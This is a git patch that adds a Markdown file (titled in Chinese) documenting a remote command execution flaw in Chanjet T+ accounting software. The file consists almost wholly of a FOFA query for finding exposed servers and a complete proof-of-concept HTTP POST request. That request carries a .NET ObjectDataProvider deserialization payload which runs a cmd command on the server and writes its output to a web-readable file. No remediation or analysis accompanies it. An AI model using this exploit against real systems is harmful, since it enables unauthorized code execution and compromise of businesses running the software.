From a89d2e9db60d6bc3a9ed87676865f44c433551a7 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 10 Apr 2024 21:52:05 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=95=85=E6=8D=B7=E9=80=9ATPlus-App?= =?UTF-8?q?=5FCode.ashx=E5=AD=98=E5=9C=A8=E8=BF=9C=E7=A8=8B=E5=91=BD?= =?UTF-8?q?=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...通TPlus-App_Code.ashx存在远程命令执行漏洞.md | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞.md diff --git a/畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞.md b/畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞.md new file mode 100644 index 0000000..77792a7 --- /dev/null +++ b/畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞.md @@ -0,0 +1,36 @@ +## 畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞 + +## fofa +``` +app="畅捷通-TPlus" +``` + +## poc +``` +POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept-Encoding: gzip, deflate +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Host: 127.0.0.1 +X-Ajaxpro-Method: GetStoreWarehouseByStore +Content-Type: application/x-www-form-urlencoded +Content-Length: 570 + +{ + "storeID":{ + "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35", + "MethodName":"Start", + "ObjectInstance":{ + "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", + "StartInfo":{ + "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", + "FileName":"cmd", + "Arguments":"/c whoami > test1.txt" + } + } + } +} +``` + +写入文件路径:http://127.0.0.1/tplus/test1.txt